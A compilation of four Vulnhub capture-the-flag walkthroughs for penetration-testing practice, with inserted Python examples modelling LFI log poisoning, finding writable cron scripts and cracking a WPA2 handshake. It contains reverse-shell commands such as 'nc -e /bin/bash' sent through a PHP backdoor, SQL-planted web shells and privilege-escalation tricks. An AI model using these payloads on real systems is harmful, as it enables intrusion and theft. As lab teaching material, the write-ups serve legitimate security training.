HA: Natraj Vulnhub Walkthrough

Today we’re going to solve another boot2root challenge called “Natraj”. It’s available at Vulnhub for penetration testing practice. This lab is not difficult if we have the right basic knowledge to break such labs and pay attention to every detail found during reconnaissance. The credit for making this lab goes to Hacking Articles. Let’s get started and learn how to break it down successfully.

Level: Not defined

These labs are available on the Vulnhub website; the lab file can be downloaded from there.

Penetration Testing Methodology

Reconnaissance

  • Netdiscover
  • Nmap

Enumeration

  • Dirb
  • LinEnum

Exploitation

  • RCE with LFI and SSH Log Poisoning

Privilege Escalation

  • Abuse of Apache configuration file permissions
  • Abusing SUDO
  • Capture the flag

Walkthrough

Reconnaissance

As always, we identify the target’s IP address with the “Netdiscover” tool.

Then we list all open TCP ports with nmap.

Enumeration

We start with the web service on port 80, where we find several pictures and some information about Natraj. The page source and robots.txt contain nothing useful, at least for the moment, so we move on.

Using Dirb with its default wordlist, we find a directory called “console“.

Inside it we find a file called “file.php“:

Opening it returns nothing; it probably expects a parameter 😉

I tried using the file name as the GET parameter name (file=) and ran a proof of concept (PoC) to check whether the page was vulnerable to Local File Inclusion (LFI).

Exploiting

It was: the PoC also confirmed that the site runs on Apache. I first tried to turn the LFI into Remote Command Execution (RCE) by poisoning the Apache log, but that did not work.

Trying other log files, I found that auth.log (normally /var/log/auth.log), where the SSH service writes its messages, was readable through the LFI.

Malicious request:

Server response:

Since sshd records the login name of failed attempts verbatim, we can write PHP code into that log by supplying it as the username of an SSH connection:

We include the log through the LFI again, this time passing the command id in the variable, and confirm that it is executed.

Great! Now we start a netcat listener on port 1234 and run the command that gives us a reverse shell.

We URL-encode this line:

and send the request as shown in the image below:
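
The chain above (LFI, a PHP stub planted in auth.log through an SSH login name, then a command passed in the query string) modelled offline, as an added example that is not code from the walkthrough. It touches no network: it builds the same artefacts the attack uses and, on the defender’s side, scans auth.log for PHP tags. The target and attacker addresses and the name of the command parameter (cmd) are assumptions; the page path and the log file are the ones the walkthrough uses.

```python
"""LFI + SSH auth.log poisoning, modelled offline.

Added example; not code from the walkthrough.  Nothing here touches the
network.  It builds the artefacts the attack uses (the PHP stub sent as an
SSH login name, the auth.log line sshd writes for it, the LFI request with
the command parameter) and the defender's counterpart, a scan of auth.log
for PHP tags.  Target address, attacker address and the parameter name
"cmd" are assumptions.
"""
import re
from typing import List, Optional
from urllib.parse import quote

TARGET = "http://192.168.1.104"            # assumed target address
ATTACKER = "192.168.1.112"                 # assumed attacker address
LFI_URL = TARGET + "/console/file.php"     # vulnerable page from the walkthrough
AUTH_LOG = "/var/log/auth.log"             # sshd log on Debian/Ubuntu

# Presented to sshd as the login name:  ssh '<?php system($_GET["cmd"]); ?>'@target
# No such account exists, so sshd logs the name verbatim in an "Invalid user" line.
PHP_STUB = '<?php system($_GET["cmd"]); ?>'

# What system() should run once the log is included (listener: nc -lvnp 1234)
REVERSE_SHELL = f"nc -e /bin/bash {ATTACKER} 1234"


def sshd_invalid_user_line(username: str, src_ip: str, port: int = 48212) -> str:
    """Constructed sample of the auth.log line sshd writes for an unknown user."""
    return (f"May 12 10:31:05 natraj sshd[1337]: Invalid user {username} "
            f"from {src_ip} port {port}")


def lfi_request(path: str, cmd: Optional[str] = None) -> str:
    """URL that makes file.php include `path`.  When `path` is the poisoned
    log, `cmd` is what the planted system() call runs; it is percent-encoded
    so spaces and slashes survive the query string, which is what the
    walkthrough does by hand before sending the reverse-shell line."""
    url = f"{LFI_URL}?file={quote(path, safe='/')}"
    if cmd is not None:
        url += f"&cmd={quote(cmd, safe='')}"
    return url


# Defender's side: a PHP open or close tag has no business in an auth log.
PHP_TAG = re.compile(r"<\?(?:php\b|=)|\?>")


def find_poisoned_lines(log_text: str) -> List[str]:
    """Return the auth.log lines that carry PHP tags (poisoning attempts)."""
    return [line for line in log_text.splitlines() if PHP_TAG.search(line)]


def sample_auth_log() -> str:
    """Constructed log: two ordinary lines around the poisoned one."""
    return "\n".join([
        "May 12 10:30:58 natraj sshd[1335]: Accepted password for mahakal "
        "from 192.168.1.50 port 41022 ssh2",
        sshd_invalid_user_line(PHP_STUB, ATTACKER),
        "May 12 10:32:01 natraj CRON[1340]: pam_unix(cron:session): "
        "session opened for user root by (uid=0)",
    ])


if __name__ == "__main__":
    print("1. poison:  ssh '" + PHP_STUB + "'@" + TARGET.split("//")[1])
    print("2. verify:  " + lfi_request(AUTH_LOG, "id"))
    print("3. shell:   " + lfi_request(AUTH_LOG, REVERSE_SHELL))
    for line in find_poisoned_lines(sample_auth_log()):
        print("poisoned:   " + line)
```

Two practical points the page glosses over: sshd only writes the “Invalid user” line once an authentication attempt is made, so the password prompt must be answered (with anything); and the login name has to be one that does not exist, otherwise the line is logged in a different form. The scanner is the check a defender would run over auth.log, or wire into a log pipeline, to catch the attempt.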

If everything went well, we have a reverse shell as the user “www-data”:

We run the usual commands to upgrade it to an interactive shell.

Running the tool “LinEnum”, we see that we have write permission on the file “/etc/apache2/apache2.conf”.

Privilege Escalation (user)

I copied the file to my machine and edited the lines that set the account Apache runs as (the User and Group directives), changing them to the username “mahakal”.

We serve the edited file with a Python HTTP server, download it onto the target and overwrite the original.

Now we need a PHP reverse shell: once Apache runs as “mahakal”, requesting it gives us a shell as that user.

This web shell is placed in the directory “/var/www/html“.

We start a netcat listener on port 5555.

Apache only reads its configuration at start-up, so we reboot the machine and then request the “shell.php” file:

Back in our netcat terminal, we confirm that we are now on the machine as the user “mahakal”.

Privilege Escalation (root)

Running “sudo -l” shows that we can run the nmap binary as root without a password.

Again we run the commands needed to get an interactive shell.

The idea is to spawn a root shell: we write the shell command to a temporary file whose path is kept in a variable, then pass that file to nmap as a script (nmap’s --script option). We can do it as follows.

Having taken over the root account, we only have to read the flag to complete this great machine.

Author: David Utón is a Penetration Tester and security auditor for web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks.

Contact on LinkedIn.

Seppuku:1 Vulnhub Walkthrough

Today we are going to crack the machine called “Seppuku:1”. It is available on Vulnhub for penetration testing practice. It is an intermediate box that taught me many new things. Credit for making this lab goes to the SunCSR Team. Let’s start and learn how to breach it successfully.

Level:  Intermediate to Hard

These labs are available on the Vulnhub website; the lab file can be downloaded from there.

Penetration Testing Methodology

Reconnaissance

  • Netdiscover
  • Nmap

Enumeration

  • Abusing HTTP Services
  • Dirb

Exploiting

  • Brute forcing using hydra
  • Connecting using SSH
  • Bypassing Restricted shell

Privilege Escalation

  • Abusing Sudo
  • Capture the flag

Walkthrough

Reconnaissance

As always, the initial phase is a network scan with netdiscover to identify the host IP, which here is 192.168.1.104.

Then we used nmap for port enumeration and found port 21 (FTP), 22 (SSH), 80 (HTTP), 139 and 445 (NetBIOS-ssn/SMB), 7080 (HTTPS), 7601 (HTTP) and 8088 (HTTP) open.

Enumeration

For more detail we enumerate the host machine. Since port 7601 is open, I browse to the target’s web service on 192.168.1.104 but unfortunately find nothing useful.

Next we use dirb for directory brute-forcing and, with the following command, find two directories, keys and secret, returning status 200 OK.

Browsing to the first directory, keys, we find some files; private is the useful one.

This link leads to a page called private, which contains an SSH private key for a user we have not identified yet.

Next we explore the other directory from the dirb scan, secret.

It contains some very useful files, such as password.lst and hostname.

The hostname file gives us a username: seppuku.

Exploiting

With the username seppuku, the next job is to find its password. We brute-force the SSH login with hydra; the obvious wordlist is the password.lst file we found in the secret directory during the dirb scan.

Hydra finds the password eeyoree for seppuku.

With a username and password, we try SSH on the target system and log in successfully.

Once logged in, we look for hidden files and find one called .passwd containing a password, although we do not yet know what it belongs to.

We then try to change into the home directory but cannot, because we are in a restricted shell (rbash). 🤔

Since we have the user’s SSH credentials, we can escape the jail by telling ssh to run a normal bash instead of the restricted login shell, with the following command:

Now we can enter the home directory. Checking the hidden files again, we find two more users, samurai and tanto.

So we log in as samurai with the password found in the .passwd hidden file.

We use the sudo -l command to check whether this user can run anything with root privileges.

The output shows that samurai can run a command called .cgi_bin/bin (under tanto’s home directory) with root privileges.

Privilege Escalation

If you remember, we found a private key while performing directory brute-forcing. I copied the contents of the private file from the keys directory into an empty file named sshkey and gave it chmod 600 permissions.

Since port 22 is open on the target machine, we try to connect with this key as the user tanto, with the following command.

After logging in as tanto, we look for the .cgi_bin directory that the sudo rule refers to, but it does not exist. So I create the directory .cgi_bin and save a bash script that spawns a shell in an executable file named “bin”.

Now it is time to abuse the sudo rule: we log in as samurai again, run the following command, obtain a root shell and finish the challenge by capturing the root flag 🚩.

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact here.

LemonSqueezy:1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “LemonSqueezy:1”. It is available on Vulnhub for penetration testing practice. This lab is not that difficult if we have the proper basic knowledge of cracking labs. Credit for making this lab goes to James Hay. Let’s start and learn how to breach it successfully.

Level: Easy to Intermediate

These labs are available on the Vulnhub website; the lab file can be downloaded from there.

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • Abusing HTTP Services
  • Web Directory Bruteforce (dirb)
  • Wpscan for Username and Password Enumeration

Exploitation

  • Logging to WordPress
  • Shell Uploading through PhpMyAdmin

Post Enumeration

  • Using LinEnum.sh
  • Creating Netcat Shell using msfvenom

 Privilege Escalation

  • Abusing cronjob for Writable Script
  • Capture the flag

Walkthrough

Reconnaissance

As always, the initial phase is a network scan with netdiscover to identify the host IP, which here is 192.168.1.105.

Then we used nmap for port enumeration and found only port 80 (HTTP) open.

Enumeration

For more detail we enumerate the host machine. Since port 80 is open, I browse to 192.168.1.105, but the page is not much help. Moving on.

Next we use dirb for directory brute-forcing and, with the following command, find phpmyadmin and wordpress pages returning status 200 OK.

Browsing the wordpress page listed above turns up nothing useful.

So the first idea was to run wpscan against the site and see what it enumerates.

It found two usernames: orange and lemon.

The next job is to find a password for the user orange, using rockyou.txt. Time to fire up wpscan with the username and the password list to find a valid login combination.

wpscan finds the password for orange. Let’s make good use of it.

Before that, we add the site’s domain name to our /etc/hosts file, mapped to the target machine’s IP address.

We then log in to WordPress with orange’s credentials. It holds another clue for us: in the edit-post section we find another password.

The next job is to try that password with the user orange on the phpMyAdmin login page.

Exploitation

After logging in, let’s explore phpMyAdmin for useful information.

Here we find a database named wordpress.

With access to phpMyAdmin, it is time to use it to get a reverse connection. We have already published a post on “Shell Uploading in Web Server through PhpMyAdmin”, and I follow the steps from that post here.

Within the wordpress database we create a table; I named it raj and clicked Create.

Click on raj and then on the SQL tab, where a MySQL query can be entered against the database.

This is the interesting part: the SQL query entered here is malicious and writes a PHP backdoor into the web root, giving us remote code execution on the web server. In the following screenshot you can see the PHP code given as the SQL query; clicking Go executes it.

Now browse to the following URL to check whether the backdoor was created:

Opening that URL in the browser returns information from the victim’s machine.

Now we get a netcat reverse connection from the host by requesting the following URL (the browser percent-encodes the spaces in the query string).

http://192.168.1.105/wordpress/backdoor.php?cmd=nc -e /bin/bash 192.168.1.112 1234

Before requesting the backdoor, start a netcat listener in another terminal.

Oh yeah!! We got the reverse shell, but it is not a proper shell, so we spawn a TTY shell using python.

Here we find a text file named user.txt, the first flag. Now we go for privilege escalation, starting with post-enumeration using LinEnum.sh.

cat user.txt

Post Enumeration

We tried to download LinEnum.sh into /tmp but could not, as we lacked permission to write there. Since /var/www/html/wordpress is writable, we download it there instead.

LinEnum.sh is a bash script that enumerates a Linux machine: running services, privileged access, version information, system information, user information and so on.

  1. Locate the script on the attacking machine.
  2. Host it with a Python HTTP server and copy the link to the LinEnum.sh file.
  3. Download the script on the remote host with the “wget” command into the “/var/www/html/wordpress” directory.
  4. Make the LinEnum.sh script executable with the “chmod” command.
  5. Run the script on the remote machine.

Running LinEnum.sh gives us some interesting information.

In particular, /etc/logrotate.d/logrotate is writable by us and is run from a root cron job every two minutes.
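
The condition LinEnum flagged here, a script run from another user’s cron job that our account can overwrite, is easy to check for directly. The following is an added example, not the walkthrough’s or LinEnum’s code: it parses system-crontab text (the six-field form with a user column, as in /etc/crontab and /etc/cron.d/*), pulls the absolute paths out of each command and reports the ones writable by us but executed as someone else. The crontab it runs against is constructed to mirror this box’s finding, and the writability check is a parameter so the example runs offline; with the default it checks the real filesystem.

```python
"""Find cron jobs whose script we can overwrite.

Added example, not the walkthrough's or LinEnum's code.  Parses system
crontab lines (schedule, user, command), extracts every absolute path in the
command and reports paths writable by us that run as another user.  The
sample crontab below is constructed, not the target's real file.
"""
import getpass
import os
import re
from dataclasses import dataclass
from typing import Callable, Iterator, List, Optional, Tuple

# schedule: an "@reboot"-style keyword or five fields, then user, then command
CRON_LINE = re.compile(
    r"^(?P<sched>@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")
ABS_PATH = re.compile(r"/[\w./-]+")


@dataclass(frozen=True)
class Finding:
    schedule: str
    run_as: str
    path: str
    command: str


def parse_system_crontab(text: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (schedule, user, command); skip comments, blanks and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            yield m.group("sched"), m.group("user"), m.group("cmd")


def writable_cron_targets(
        text: str,
        is_writable: Callable[[str], bool] = lambda p: os.access(p, os.W_OK),
        me: Optional[str] = None) -> List[Finding]:
    """Entries run as someone else whose command references a path we can write."""
    if me is None:
        try:
            me = getpass.getuser()
        except Exception:          # no passwd entry / no USER in odd sandboxes
            me = ""
    findings = []
    for sched, user, cmd in parse_system_crontab(text):
        if user == me:
            continue               # overwriting our own job gains nothing
        for path in ABS_PATH.findall(cmd):
            if is_writable(path):
                findings.append(Finding(sched, user, path, cmd))
    return findings


# Constructed /etc/crontab mirroring the walkthrough's finding (not the real file)
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/2 *   * * *   root    /etc/logrotate.d/logrotate
@reboot         root    /usr/local/bin/start-app.sh
"""


def fake_writable(path: str) -> bool:
    """Stand-in for os.access on the target: only the logrotate script is writable."""
    return path == "/etc/logrotate.d/logrotate"


if __name__ == "__main__":
    for f in writable_cron_targets(SAMPLE_CRONTAB, fake_writable, me="www-data"):
        print(f"[{f.schedule}] as {f.run_as}: {f.path} is writable by us")
```

Once such a path is found, whatever is written into it runs as the job’s user at the next scheduled tick, which is why the next step in this walkthrough is simply to replace the script’s contents with a reverse shell and wait for cron. The same check, run by an administrator, is a quick audit for this misconfiguration.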

Privilege Escalation

To compromise the machine and get root access, we use msfvenom for the next step.

Since logrotate is writable and executed by cron, I overwrite it with the following command.

Meanwhile we start a netcat listener in another terminal and wait up to two minutes; as soon as cron runs logrotate, we get a shell with root privileges and capture the final flag.

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact here.

Victim:1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “Victim:1”. It is available on Vulnhub for penetration testing practice. This lab is not that difficult if we have the proper basic knowledge of cracking labs. Credit for making this lab goes to iamv1nc3nt. Let’s start and learn how to breach it successfully.

Level: Easy to Intermediate

These labs are available on the Vulnhub website; the lab file can be downloaded from there.

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • Wireshark

Exploiting

  • Aircrack-ng
  • SSH login

Privilege Escalation

  • Abusing writeable file
  • Capture the flag

Walkthrough

Reconnaissance

As always, we identify the host IP with netdiscover and then move on to port scanning. So, let’s start port enumeration with nmap by running the following command in our terminal.

From its result, we found ports 22 (SSH), 80 (HTTP), 8999 (HTTP) and 9000 (HTTP) open.

Enumeration

For more detail we enumerate the host machine. Since port 80 is open, I browse to 192.168.1.104 but find nothing useful.

Enumerating port 8999 instead, the page shows a directory listing of files; WPA-01.cap looks interesting, so I download it to look for a clue.

The downloaded file is a Wireshark packet capture. Opening it and following the first packet, we see the SSID: dlink, as shown in the image. The SSID is needed to crack the handshake, and it may also be usable as a credential.

Exploiting

Next we use aircrack-ng to crack the WPA handshake in the downloaded capture (saved as captured.cap) with the following command:

After a few minutes it finds the key: p4ssword, as shown in the image below.
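
What aircrack-ng is doing during those few minutes is a dictionary attack on the four-way handshake: derive the PMK from each candidate passphrase and the SSID, expand it into the PTK, and check whether the resulting KCK reproduces the MIC captured in the second EAPOL message. The block below is an added example, neither the walkthrough’s nor aircrack-ng’s code, that implements that key schedule from 802.11i (PBKDF2-HMAC-SHA1, PRF-512, HMAC-SHA1-128). A real run reads the BSSID, client MAC, nonces and EAPOL frame from the capture; here a handshake is constructed in memory with the page’s SSID and key so it runs offline. The MAC addresses, nonces, replay counter and wordlist are made up.

```python
"""Dictionary attack on a WPA2 four-way handshake (what aircrack-ng -w does).

Added example; neither the walkthrough's nor aircrack-ng's code.  Implements
the 802.11i key schedule: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32);
PTK = PRF-512(PMK, "Pairwise key expansion", MACs and nonces); KCK = PTK[:16];
MIC = HMAC-SHA1(KCK, EAPOL message 2 with MIC field zeroed)[:16].
The handshake is constructed in memory; MACs, nonces and wordlist are made up.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

SSID = "dlink"      # read from the capture in the walkthrough

# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# EAPOL hdr(4) + descriptor type(1) + key info(2) + key len(2) + replay(8)
# + nonce(32) + IV(16) + RSC(8) + key ID(8)
MIC_OFFSET = 81


@dataclass(frozen=True)
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes          # from message 1 (AP -> STA)
    snonce: bytes          # from message 2 (STA -> AP)
    eapol_msg2: bytes      # message 2 with its MIC field zeroed
    mic: bytes             # the MIC captured in message 2


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: concatenate HMAC-SHA1(PMK, label || 0x00 || data || i), i = 0..3."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion\x00"
    blocks = [hmac.new(pmk, label + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1-128 over the frame."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose KCK reproduces the captured MIC.
    The PBKDF2 step (4096 HMACs per word) is what makes this slow."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, hs.ssid)
        kck = ptk_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), hs.mic):
            return word
    return None


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (RSN descriptor, key info 0x010a:
    version 2, pairwise, MIC flag) with an all-zero MIC field."""
    body = (b"\x02"                     # descriptor type: RSN
            + b"\x01\x0a"               # key information
            + b"\x00\x10"               # key length (CCMP)
            + (1).to_bytes(8, "big")    # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)   # key IV, RSC, key ID
            + bytes(16)                 # MIC, zero while computing it
            + b"\x00\x00")              # key data length
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key
    assert frame[MIC_OFFSET:MIC_OFFSET + 16] == bytes(16)
    return frame


def make_sample_handshake(passphrase: str = "p4ssword") -> Handshake:
    """Simulate a capture: the station knows the key and MICs message 2."""
    ap_mac = bytes.fromhex("1c7ee5aabbcc")        # made-up BSSID
    sta_mac = bytes.fromhex("b827eb112233")       # made-up client address
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    msg2 = build_eapol_msg2(snonce)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID),
                       ap_mac, sta_mac, anonce, snonce)[:16]
    return Handshake(SSID, ap_mac, sta_mac, anonce, snonce, msg2, eapol_mic(kck, msg2))


WORDLIST = ["password", "dlink123", "letmein", "p4ssword", "Passw0rd"]   # made up


if __name__ == "__main__":
    print("KEY FOUND!", crack(make_sample_handshake(), WORDLIST))
```

Two things this makes visible that the tool hides: the SSID is part of the PBKDF2 salt, so a capture without a beacon or probe response carrying it cannot be cracked without the -e option; and a weak, dictionary-grade passphrase like the one on this box falls regardless of how strong the rest of WPA2 is, because the only secret in the whole derivation is that passphrase.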

Trying dlink as the username and the cracked key as the password, we log in to SSH on the target system successfully.

Once logged in, we move to post-exploitation and try to escalate to root. During post-enumeration we find that /var/www/bolt/public/files is writable.

This directory is owned by root but writable by everyone, so we download php-reverse-shell from our local machine onto the target with wget, using the following command:

Then we request our php-reverse-shell in the browser. Before that, start netcat in another terminal to catch the reverse shell, which comes back with root privileges, and capture the final flag.

Second method for privilege escalation

nohup runs the program given as its argument immune to hangup (SIGHUP) signals. On this machine it has the SUID bit set, so it can be abused to access the file system, escalate privileges or maintain access, acting as a SUID backdoor. When using it to run sh -p, omit the -p argument on systems such as Debian (<= Stretch) that let the default sh run with SUID privileges. See our post on nohup privilege escalation.

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact here.